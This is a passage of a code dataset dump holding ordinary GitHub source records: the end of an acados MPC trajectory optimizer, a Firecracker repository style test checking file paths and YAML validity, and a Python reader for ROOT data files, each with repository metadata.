stacked_x_target[self.N, :])\n return gp_ind\n\n \n def run_optimization(self, initial_state=None, use_model=0, return_x=False, gp_regression_state=None):\n \"\"\"\n Optimizes a trajectory to reach the pre-set target state, starting from the input initial state, that minimizes\n the quadratic cost function and respects the constraints of the system\n\n :param 
initial_state: 13-element list of the initial state. If None, 0 state will be used\n :param use_model: integer, select which model to use from the available options.\n :param return_x: bool, whether to also return the optimized sequence of states alongside with the controls.\n :param gp_regression_state: 13-element list of state for GP prediction. If None, initial_state will be used.\n :return: optimized control input sequence (flattened)\n \"\"\"\n\n if initial_state is None:\n initial_state = [0.0, 0.0] + [0.0]+ [0.0]\n\n # Set initial state. Add gp state if needed\n x_init = initial_state\n x_init = np.stack(x_init)\n x_init = x_init.squeeze()\n\n # Set initial condition, equality constraint\n self.acados_ocp_solver[use_model].set(0, 'lbx', x_init)\n self.acados_ocp_solver[use_model].set(0, 'ubx', x_init)\n \n # Solve OCPacados_ocp_solver\n self.acados_ocp_solver[use_model].solve()\n\n # Get u\n w_opt_acados = np.ndarray((self.N, 2))\n x_opt_acados = np.ndarray((self.N + 1, len(x_init)))\n x_opt_acados[0, :] = self.acados_ocp_solver[use_model].get(0, \"x\")\n for i in range(self.N):\n w_opt_acados[i, :] = self.acados_ocp_solver[use_model].get(i, \"u\")\n x_opt_acados[i + 1, :] = self.acados_ocp_solver[use_model].get(i + 1, \"x\")\n\n w_opt_acados = np.reshape(w_opt_acados, (-1))\n return w_opt_acados if not return_x else (w_opt_acados, x_opt_acados)\n", "repo_name": "amilearning/hmclmobil", "sub_path": "data_driven_mpc/ros_gp_mpc/src/ad_mpc/ad_3d_optimizer.py", "file_name": "ad_3d_optimizer.py", "file_ext": "py", "file_size_in_byte": 14684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 58, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 58, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 59, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 59, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 60, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 60, "usage_type": "attribute"}, {"api_name": "casadi.vertcat", "line_number": 63, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 67, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 67, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 68, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 68, "usage_type": "attribute"}, {"api_name": "casadi.vertcat", "line_number": 70, "usage_type": "call"}, {"api_name": "casadi.Function", "line_number": 91, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.utils.safe_mkdir_recursive", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 100, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sys.path.insert", 
"line_number": 109, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosOcp", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosOcpSolver", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 172, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 188, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 188, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosModel", "line_number": 192, "usage_type": "call"}, {"api_name": "casadi.vertcat", "line_number": 226, "usage_type": "call"}, {"api_name": "casadi.Function", "line_number": 227, "usage_type": "call"}, {"api_name": "casadi.atan", "line_number": 230, "usage_type": "call"}, {"api_name": "casadi.tan", "line_number": 230, "usage_type": "call"}, {"api_name": "casadi.vertcat", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.cos", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.sin", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.atan", "line_number": 234, "usage_type": "call"}, {"api_name": "casadi.tan", "line_number": 234, "usage_type": "call"}, {"api_name": "casadi.sin", "line_number": 235, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 253, "usage_type": "call"}, {"api_name": 
"numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 277, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 338, "usage_type": "call"}]} +{"seq_id": "22342901978", "text": "import subprocess\nfrom pathlib import Path\n\nimport yaml\n\n\ndef test_repo_no_spaces_in_paths():\n \"\"\"\n Ensure there are no spaces in paths.\n \"\"\"\n # pylint: disable-next=subprocess-run-check\n res = subprocess.run(\n \"git ls-files | grep '[[:space:]]'\",\n cwd=\"..\",\n capture_output=True,\n shell=True,\n )\n # If grep doesn't find any, it will exit with status 1. Otherwise 0\n assert res.returncode == 1, \"Some files have spaces:\\n\" + res.stdout.decode()\n\n\ndef test_repo_validate_yaml():\n \"\"\"\n Ensure all YAML files are valid\n \"\"\"\n\n repo_root = Path(\"..\")\n for path in repo_root.rglob(\"*.y*ml\"):\n yaml.safe_load(path.open(encoding=\"utf-8\"))\n", "repo_name": "firecracker-microvm/firecracker", "sub_path": "tests/integration_tests/style/test_repo.py", "file_name": "test_repo.py", "file_ext": "py", "file_size_in_byte": 705, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22949, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.run", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "35720140165", "text": "import rootio.ROOT as ROOT\nfrom rootio import TBuffer\nfrom rootio import TDirectory\nfrom rootio.StreamerDict import Streamers\nfrom rootio.IOData import IOData\nimport os\nimport logging\nfrom . 
import UnZip\nimport box \nimport json\n\n\nclass TFile (object) :\n\tdef __init__(self, url) :\n\t\t\n\t\tself.logger = logging.getLogger( \"rootio.TFile\" )\n\t\t# self.logger.debug( \"Creating TFile[ url=%s ]\", url )\n\t\tself._typename = \"TFile\"\n\t\tself.fEND = 0\n\t\tself.fFullURL = url\n\t\tself.fURL = url\n\t\tself.fAcceptRanges = True\n\t\tself.fUseStampPar = \"stamp = \"\n\t\tself.fFileContent = None\n\t\tself.fMaxRanges = 200\n\t\tself.fDirectories = []\n\t\tself.fKeys = []\n\t\tself.fSeekInfo = 0\n\t\tself.fNbytesInfo = 0\n\t\tself.fTagOffset = 0\n\t\tself.fStreamerInfos = None\n\t\tself.fFileName = \"\"\n\t\tself.fStreamers = {}\n\t\tself.fBasicTypes = {}\n\n\t\t# TLocalFile parts\n\t\t\n\t\tself.fUseStampPar = False;\n\n\t\tif os.path.isfile( url ):\n\t\t\t# TODO open file\n\t\t\tfile = open( url, \"rb\")\n\t\t\tself.fLocalFile = file\n\t\t\tself.fEND = os.stat( url ).st_size\n\t\t\tself.fFullURL = file.name;\n\t\t\tself.fURL = file.name;\n\t\t\tself.fFileName = file.name;\n\t\telse :\n\t\t\traise Exception( \"File DNE\" )\n\n\t\tself.ReadKeys()\n\n\tdef to_json( self ) :\n\t\tobj = {\n\t\t\t\"_typename\": self._typename,\n\t\t\t\"fAcceptRanges\": self.fAcceptRanges,\n\t\t\t\"fBEGIN\": self.fBEGIN,\n\t\t\t\"fBasicTypes\": self.fBasicTypes,\n\t\t\t\"fCompress\": self.fCompress,\n\t\t\t\"fDatimeC\" : self.fDatimeC,\n\t\t\t\"fDatimeM\" : self.fDatimeM,\n\t\t\t\"fDirectories\" : self.fDirectories,\n\t\t\t\"fEND\" : self.fEND,\n\t\t\t\"fFileContent\" : self.fFileContent,\n\t\t\t\"fFileName\" : self.fFileName,\n\t\t\t\"fFullURL\" : self.fFullURL,\n\t\t\t\"fKeys\" : self.fKeys,\n\t\t\t\"fMaxRanges\" : self.fMaxRanges,\n\t\t\t\"fNbytesFree\" : self.fNbytesFree,\n\t\t\t\"fNbytesInfo\" : self.fNbytesInfo,\n\t\t\t\"fNbytesKeys\" : self.fNbytesKeys,\n\t\t\t\"fNbytesName\" : self.fNbytesName,\n\t\t\t\"fSeekDir\" : self.fSeekDir,\n\t\t\t\"fSeekFree\" : self.fSeekFree,\n\t\t\t\"fSeekInfo\" : self.fSeekInfo,\n\t\t\t\"fSeekKeys\" : self.fSeekKeys,\n\t\t\t\"fSeekParent\" : self.fSeekParent,\n\t\t\t\"fStreamerInfos\" : self.fStreamerInfos,\n\t\t\t\"fStreamers\" : self.fStreamers,\n\t\t\t\"fTagOffset\" : self.fTagOffset,\n\t\t\t\"fTitle\" : self.fTitle,\n\t\t\t\"fURL\" : self.fURL,\n\t\t\t\"fUnits\" : self.fUnits,\n\t\t\t\"fUseStampPar\" : self.fUseStampPar,\n\t\t\t\"fVersion\" : self.fVersion,\n\t\t\t# \"dict\" : self.__dict__.keys()\n\t\t}\n\t\treturn obj\n\n\n\tdef list_keys(self) :\n\t\tfor k in self.fKeys :\n\t\t\tfqn = k['fName']\n\t\t\tprint( \"[%s]: \" %( k['fClassName'] ) + fqn )\n\t\t\tif \"TDirectory\" == k['fClassName'] :\n\t\t\t\ttdir = self.ReadObject( fqn )\n\t\t\t\ttdir.list_keys( prefix=fqn )\n\n\n\tdef ReadBuffer( self, place ) :\n\t\t# self.logger.debug( \"ReadBuffer( %s )\", place )\n\t\tself.fLocalFile.seek( place[0] )\n\t\treturn self.fLocalFile.read( place[1] )\n\n\tdef GetDir(self, dirname, cycle ):\n\t\tif None == cycle and type(dirname) is str :\n\t\t\tpos = dirname.rfind( ';' )\n\t\t\tif pos > 0 :\n\t\t\t\tcycle = dirname[ pos+1: ]\n\t\t\t\tdirname = dirname[ 0:pos ]\n\t\t\n\t\tfor j in range( 0, len(self.fDirectories) ) :\n\t\t\ttdir = self.fDirectories[j]\n\t\t\tif tdir.dir_name != dirname :\n\t\t\t\tcontinue\n\t\t\treturn tdir\n\t\treturn None\n\n\tdef GetKey(self, keyname, cycle ) :\n\t\tfor i in range( 0, len(self.fKeys) ) :\n\t\t\tif 'fName' in self.fKeys[i] and self.fKeys[i]['fName'] == keyname and 'fCycle' in self.fKeys[i] and self.fKeys[i]['fCycle'] == cycle :\n\t\t\t\treturn self.fKeys[i]\n\t\t\n\t\t# look for directories\n\t\tpos = keyname.rfind( '/' 
)\n\n\t\twhile pos > 0 :\n\t\t\tdirname = keyname[0:pos]\n\t\t\tsubname = keyname[pos+1:]\n\t\t\t\n\t\t\ttdir = self.GetDir( dirname, 1 )\n\t\t\tif None != tdir :\n\t\t\t\treturn tdir.GetKey( subname, cycle )\n\t\t\t\n\t\t\tdirkey = self.GetKey( dirname, 1 )\n\t\t\t\n\t\t\tif None != dirkey and \"fClassName\" in dirkey and \"TDirectory\" in dirkey['fClassName'] :\n\t\t\t\ttdir = self.ReadObject( dirname )\n\t\t\t\tif None != tdir :\n\t\t\t\t\treturn tdir.GetKey( subname, cycle )\n\t\t\t\n\t\t\tpos = keyname.rfind( '/', 0, pos-1 )\n\t\t\n\t\treturn None\n\t\t#TODO : add second part of impl\n\n\tdef ReadObjBuffer(self, key ) :\n\t\t# self.logger.debug( \"ReadObjBuffer( %s )\", key )\n\t\tblob1 = self.ReadBuffer( [key['fSeekKey'] + key['fKeylen'], key['fNbytes'] - key['fKeylen']] )\n\t\tif None == blob1 :\n\t\t\treturn None\n\n\t\tbuf = None\n\t\tif key['fObjlen'] <= (key['fNbytes'] - key['fKeylen']) : \n\t\t\tbuf = TBuffer( blob1, 0, self, None )\n\t\telse :\n\t\t\t# self.logger.debug( \"UNZIPPING obj buffer\" )\n\t\t\tobjbuf = UnZip.R__unzip(blob1, key['fObjlen'])\n\t\t\tif None == objbuf :\n\t\t\t\treturn None\n\t\t\tbuf = TBuffer( objbuf, 0, self, None )\n\n\t\t\n\t\tbuf.fTagOffset = key['fKeylen']\n\t\treturn buf\n\n\tdef AddReadTree(self, obj ) :\n\t\t# self.logger.debug( \"AddReadTree( %s )\", obj )\n\t\tpass\n\n\tdef Get( self, obj_name, cycle=1 ) :\n\t\tobj = self.ReadObject( obj_name, cycle )\n\t\tif None == obj :\n\t\t\treturn None\n\n\t\ttry :\n\t\t\tfrom rootio.Histogram import Histogram\n\t\t\tif \"TH1\" in obj['_typename'] or \"TH2\" in obj['_typename'] or \"TH3\" in obj['_typename'] :\n\t\t\t\treturn Histogram( obj )\n\t\texcept KeyError as ke :\n\t\t\tself.logger.error( ke )\n\n\t\treturn None\n\n\n\n\tdef ReadObject(self, obj_name, cycle = 1) :\n\t\t# self.logger.debug( \"ReadObject( obj_name=%s, cycle=%d )\", obj_name, cycle )\n\n\t\t# if type( cycle ) === function :\n\t\tif callable( cycle ) :\n\t\t\tcycle = 1 \n\n\t\tpos = obj_name.rfind( ';' )\n\t\tif pos > 0 :\n\t\t\tcycle = int( obj_name[pos+1 : pos+2 ] )\n\t\t\tobj_name = obj_name[ 0 : pos ]\n\n\t\tif cycle < 0 :\n\t\t\tcycle = 1\n\n\t\twhile ( len(obj_name) > 0 and obj_name[0] == \"/\" ) :\n\t\t\tobj_name = obj_name[ 1: ]\n\n\t\tkey = self.GetKey( obj_name, cycle )\n\t\tif None == key :\n\t\t\treturn None\n\n\t\tif \"StreamerInfo\" == obj_name and \"TList\" == key['fClassName'] :\n\t\t\treturn self.fStreamerInfos\n\n\t\tisdir = False\n\t\tif \"TDirectory\" == key['fClassName'] or \"TDirectoryFile\" == key['fClassName'] :\n\t\t\tisdir = True\n\t\t\ttdir = self.GetDir( obj_name, cycle )\n\t\t\tif None != tdir :\n\t\t\t\treturn tdir\n\n\t\tbuf = self.ReadObjBuffer( key )\n\t\tif None == buf :\n\t\t\treturn None\n\n\t\tif isdir :\n\t\t\ttdir = TDirectory( self, obj_name, cycle )\n\t\t\ttdir.fTitle = key['fTitle']\n\t\t\ttdir.ReadKeys( buf )\n\t\t\treturn tdir\n\n\t\tobj = {}\n\t\tbuf.MapObject( 1, obj )\n\t\tbuf.ClassStreamer( obj, key['fClassName'] )\n\n\t\tif \"TF1\" == key['fClassName'] :\n\t\t\treturn self.ReadFormulas( obj, -1 )\n\n\t\t#TODO : add Tree support\n\n\t\treturn obj\n\n\tdef ReadFormulas(self, tf1, cnt ) :\n\t\t# self.logger.debug( \"ReadFormulas( ... 
)\" )\n\t\tpass\n\t\t# TODO :add\n\n\tdef ExtractStreamerInfos( self, buf ) :\n\t\t# self.logger.debug( \"ExtractStreamerInfos( buf=%s )\", buf )\n\t\tif None == buf :\n\t\t\treturn\n\n\t\tlst = {}\n\t\tbuf.MapObject( 1, lst )\n\t\tbuf.ClassStreamer( lst, 'TList' )\n\t\t\n\t\tlst['_typename'] = \"TStreamerInfoList\"\n\n\t\tself.fStreamerInfos = lst\n\t\t# self.logger.debug( \"fStreamerInfos = \\n %s\", json.dumps(lst, indent=4) )\n\n\t\t# TODO : add to ROOT\n\t\t# ROOT.addStreamerInfos( lst )\n\n\t\tfor k in range( 0, len(lst['arr']) ) :\n\t\t\t# self.logger.info( \"LOOP %d\", k )\n\t\t\t# self.logger.info( json.dumps( self, indent=4, sort_keys=True ) )\n\t\t\tsi = lst['arr'][k]\n\t\t\t\n\t\t\tif 'fElements' not in si or None == si['fElements'] :\n\t\t\t\tcontinue\n\n\t\t\tfor l in range( 0, len(si['fElements']['arr']) ) :\n\t\t\t\telem = si['fElements']['arr'][l]\n\n\t\t\t\tif 'fTypeName' not in elem or None == elem['fTypeName'] or 'fType' not in elem or None == elem['fType'] :\n\t\t\t\t\tcontinue\n\n\t\t\t\ttyp = elem['fType'] \n\t\t\t\ttypename = elem['fTypeName']\n\n\t\t\t\tif typ >= 60 :\n\t\t\t\t\tif IOData.kStreamer == typ and \"TStreamerSTL\" == elem['_typename'] and None != elem['fSTLtype'] and None != elem['fCtype'] and elem['fCtype'] < 20 :\n\t\t\t\t\t\tprefix = IOData.StlNames[ elem['fSTLtype'] ] if None != IOData.StlNames and None != IOData.StlNames[ elem['fSTLtype'] ] else \"undef\" + \"<\"\n\t\t\t\t\t\tif 0 == typename.find( prefix ) and \">\" == typename[ -1 ] :\n\t\t\t\t\t\t\ttyp = elem['fCtype']\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#TODO trim string\n\t\t\t\t\t\t\ttypename = typename[ len(prefix) : len(typename) - len(prefix) - 1 ].strip()\n\t\t\t\t\t\t\tif IOData.kSTLmap == elem['fSTLtype'] or IOData.kSTLmultimap == elem['fSTLtype'] :\n\t\t\t\t\t\t\t\tif typename.find(',')>0 :\n\t\t\t\t\t\t\t\t\ttypename = typename[ 0: typename.find( ',' ) ].strip()\n\t\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tif typ > 60 :\n\t\t\t\t\t\tcontinue\n\t\t\t\telse :\n\t\t\t\t\tif typ > 20 and \"*\" == typename[ -1 ] :\n\t\t\t\t\t\ttypename = typename[ 0 : -1 ]\n\t\t\t\t\ttyp = typ % 20\n\n\t\t\t\tkind = ROOT.ROOT.GetTypeId( typename )\n\t\t\t\tif kind == typ :\n\t\t\t\t\tcontinue\n\n\t\t\t\tif IOData.kBits == typ and IOData.kUInt == kind :\n\t\t\t\t\tcontinue\n\t\t\t\tif IOData.kCounter and IOData.kInt == kind :\n\t\t\t\t\tcontinue\n\n\t\t\t\tif None != typename and None != typ :\n\t\t\t\t\t# self.logger.debug( \"Extract basic data type %s %s\", typ, typename )\n\t\t\t\t\tself.fBasicTypes[ typename ] = typ\n\t\t# self.logger.info( \"after extracting streamer info:\" )\n\t\t# self.logger.info( json.dumps( self, indent=4, sort_keys=True ) )\n\n\tdef __getitem__(self, key):\n\t\treturn getattr(self, key)\n\tdef __setitem__(self, key, value) :\n\t\tobject.__setattr__( self, key, value )\n\n\tdef ReadKeys( self ) :\n\t\tblob = self.ReadBuffer( [0, 1024] )\n\t\tif None == blob :\n\t\t\treturn None\n\n\t\tbuf = TBuffer( blob, 0, self, None )\n\t\tftype = buf.substring( 0, 4 )\n\t\t# self.logger.debug( \"fType=%s\", ftype )\n\t\tif ftype != 'root' :\n\t\t\t# self.logger.debug(\"NOT A ROOT FILE\")\n\t\t\treturn\n\n\t\tbuf.shift( 4 )\n\n\t\tself.fVersion = buf.ntou4()\n\t\tself.fBEGIN = buf.ntou4()\n\t\tif self.fVersion < 1000000 : # small size\n\t\t\tself.fEND = buf.ntou4()\n\t\t\tself.fSeekFree = buf.ntou4()\n\t\t\tself.fNbytesFree = buf.ntou4()\n\t\t\tnfree = buf.ntoi4()\n\t\t\tself.fNbytesName = buf.ntou4()\n\t\t\tself.fUnits = buf.ntou1()\n\t\t\tself.fCompress = 
buf.ntou4()\n\t\t\tself.fSeekInfo = buf.ntou4()\n\t\t\tself.fNbytesInfo = buf.ntou4()\n\t\telse :\n\t\t\tself.fEND = buf.ntou8()\n\t\t\tself.fSeekFree = buf.ntou8()\n\t\t\tself.fNbytesFree = buf.ntou8()\n\t\t\tnfree = buf.ntou4()\n\t\t\tself.fNbytesName = buf.ntou4()\n\t\t\tself.fUnits = buf.ntou1()\n\t\t\tself.fCompress = buf.ntou4()\n\t\t\tself.fSeekInfo = buf.ntou8()\n\t\t\tself.fNbytesInfo = buf.ntou4()\n\n\t\t# self.logger.debug(\"File Header:\")\n\t\t# self.logger.debug( \"self.fVersion = %d\", self.fVersion)\n\t\t# self.logger.debug( \"self.fBEGIN = %d\", self.fBEGIN)\n\t\t# self.logger.debug( \"self.fEND = %d\", self.fEND )\n\t\t# self.logger.debug( \"self.fSeekFree = %d\", self.fSeekFree )\n\t\t# self.logger.debug( \"self.fNbytesFree = %d\", self.fNbytesFree )\n\t\t# self.logger.debug( \"self.fNbytesName = %d\", self.fNbytesName )\n\t\t# self.logger.debug( \"self.fUnits = %d\", self.fUnits )\n\t\t# self.logger.debug( \"self.fCompress = %d\", self.fCompress )\n\t\t# self.logger.debug( \"self.fSeekInfo = %d\", self.fSeekInfo )\n\t\t# self.logger.debug( \"self.fNbytesInfo = %d\", self.fNbytesInfo )\n\t\t# self.logger.debug( \"\" )\n\n\t\tif None == self.fSeekInfo or None == self.fNbytesInfo :\n\t\t\treturn None\n\t\tif 0 == self.fNbytesName or self.fNbytesName > 100000 :\n\t\t\t# self.logger.debug( \"Init : cannot read directory info for file :\", self.fURL )\n\t\t\treturn None\n\n\t\tnbytes = self.fNbytesName + 22;\n\t\tnbytes += 4; # fDatimeC.Sizeof();\n\t\tnbytes += 4; # fDatimeM.Sizeof();\n\t\tnbytes += 18; # fUUID.Sizeof();\n\t\tif self.fVersion >= 40000 :\n\t\t\tnbytes += 12;\n\n\t\tblob3 = self.ReadBuffer( [self.fBEGIN, max( 300, nbytes )] )\n\t\tbuf3 = TBuffer( blob3, 0, self, None )\n\n\t\tself.fTitle = buf3.ReadTKey()['fTitle']\n\t\t# self.logger.debug( \"self.fTitle = %s\", self.fTitle )\n\t\tbuf3.locate( self.fNbytesName )\n\t\tbuf3.ClassStreamer( self, 'TDirectory' )\n\n\t\t# self.logger.info( \"file now:\" )\n\t\t# self.logger.info( json.dumps(self, indent=4, sort_keys=True) )\n\n\t\tif False == hasattr( self, 'fSeekKeys' ) or 0 == self.fSeekKeys :\n\t\t\t# self.logger.debug( \"Empty key list in\", self.fURL )\n\t\t\treturn None\n\n\t\tblob4 = self.ReadBuffer( [self.fSeekKeys, self.fNbytesKeys] )\n\t\tbuf4 = TBuffer( blob4, 0, self, None )\n\n\t\tbuf4.ReadTKey()\n\t\tnkeys = buf4.ntoi4()\n\t\tfor i in range( 0, nkeys ) :\n\t\t\tk = buf4.ReadTKey()\n\t\t\t# self.logger.debug( \"Adding Key : %s %s, %s \", k['fClassName'], k['fName'], k['fTitle'] )\n\t\t\tself.fKeys.append( k )\n\n\t\tblob5 = self.ReadBuffer( [self.fSeekInfo, self.fNbytesInfo] )\n\t\tbuf5 = TBuffer( blob5, 0, self, None )\n\t\tsi_key = buf5.ReadTKey()\n\t\tif None == si_key :\n\t\t\t# self.logger.debug( \"No info?\" )\n\t\t\treturn None\n\n\t\tself.fKeys.append( si_key )\n\t\t# self.logger.debug( \"StreamerInfo:\", si_key )\n\t\tbuf6 = self.ReadObjBuffer( si_key )\n\t\tif None != buf6 :\n\t\t\tself.ExtractStreamerInfos( buf6 )\n\n\tdef GetStreamer(self, classname, ver, s_i = None ):\n\t\tself.logger.debug( \"GetStreamer(classname=%s, ver=%s, s_i=%s )\", classname, ver, s_i )\n\t\tif 'TQObject' == classname or 'TBasket' == classname :\n\t\t\treturn None\n\n\t\tfullname = classname\n\t\tstreamer = None \n\n\t\tif \"TH1\" == classname :\n\t\t\tself.logger.debug(\"TH1\")\n\n\t\tif None != ver and ( 'checksum' in ver or 'val' in ver ) :\n\t\t\tfullname += \"$chksum\" + str(ver['checksum']) if 'checksum' in ver else \"$ver\" + str(ver['val'])\n\t\t\tself.logger.debug( \"Looking for streamer : %s\",fullname 
)\n\t\t\tstreamer = self.fStreamers[ fullname ] if fullname in self.fStreamers else None\n\t\t\tif None != streamer :\n\t\t\t\tself.logger.debug( \"Found Streamer, just trust me\" )\n\n\t\t\t\treturn streamer\n\n\t\tself.logger.debug( \"Looking for custom streamer named %s\", classname)\n\n\t\tCustomStreamers = Streamers.CustomStreamers\n\t\tcustom = CustomStreamers[ classname ] if classname in CustomStreamers else None\n\n\t\tif None != custom :\n\t\t\tself.logger.debug(\"Found custom streamer for %s\", classname )\n\t\t\t\n\t\tif type( custom ) == str :\n\t\t\treturn self.GetStreamer( custom, ver, s_i )\n\n\t\tif True == callable( custom ) :\n\t\t\tstreamer = [ { 'typename' : classname, 'func': custom } ]\n\t\t\treturn ROOT.ROOT.AddClassMethods( classname, streamer )\n\n\t\tstreamer = []\n\t\tif box.BoxList == type( custom ) :\n\t\t\tif 'name' not in custom and 'func' not in custom :\n\t\t\t\treturn custom\n\t\t\tstreamer.append( custom )\n\t\t\n\t\t# check element in streamer infos, one can have special cases\n\t\tif None == s_i : \n\t\t\ts_i = self.FindStreamerInfo(classname, ver['val'], ver['checksum'] if 'checksum' in ver else None);\n\n\t\tif None == s_i :\n\t\t\t# delete this.fStreamers[fullname];\n\t\t\tif fullname in self.fStreamers :\n\t\t\t\tself.logger.debug( \"s_i is None but % in Streamers\", fullname )\n\n\t\t\tif 'nowarning' not in ver or ver['nowarning'] == None :\n\t\t\t\tself.logger.debug(\"Not found streamer for %s, ver=%s, checksum=%s, fullname=%s\", classname, ver['val'], ver['checksum'] if 'checksum' in ver else None, fullname)\n\t\t\treturn None\n\n\t\t# for each entry in streamer info produce member function\n\n\t\ttry :\n\t\t\tself.logger.debug( \"s_i = %s\", s_i )\n\t\t\tfor obj in s_i['fElements']['arr'] :\n\t\t\t\t# obj = s_i['fElements']['arr'][s]\n\t\t\t\tstreamer.append( ROOT.ROOT.CreateMember( obj, self ) )\n\t\t\t\tself.logger.debug( \"Appending streamer for obj=%s\", obj )\n\t\texcept KeyError :\n\t\t\tself.logger.debug( \"No fElements.arr\" )\n\t\tself.logger.debug( \"fStreamers[%s] = %s\", fullname, streamer )\n\t\t\n\t\tself.logger.debug( \"fStreamers[%s] = SET\", fullname )\n\t\tself.fStreamers[fullname] = streamer;\n\n\t\treturn ROOT.ROOT.AddClassMethods(classname, streamer);\n\n\tdef FindStreamerInfo( self, clname, clversion, clchecksum = None ) :\n\t\tif None == self.fStreamerInfos :\n\t\t\treturn None\n\n\t\tfor si in self.fStreamerInfos['arr'] :\n\t\t\tif clchecksum != None and si['fCheckSum'] == clchecksum :\n\t\t\t\treturn si\n\t\t\tif si['fName'] != clname :\n\t\t\t\tcontinue\n\t\t\t# this means that if it as not found by checksum it should have been None\n\t\t\t# if checksum was given it should match\n\t\t\tif clchecksum != None :\n\t\t\t\tcontinue\n\n\t\t\tif clversion != None and si['fClassVersion'] != clversion :\n\t\t\t\tcontinue\n\n\t\t\treturn si\n\n\t\treturn None", "repo_name": "jdbrice/root-io", "sub_path": "rootio/TFile.py", "file_name": "TFile.py", "file_ext": "py", "file_size_in_byte": 15142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 44, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 155, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 161, "usage_type": 
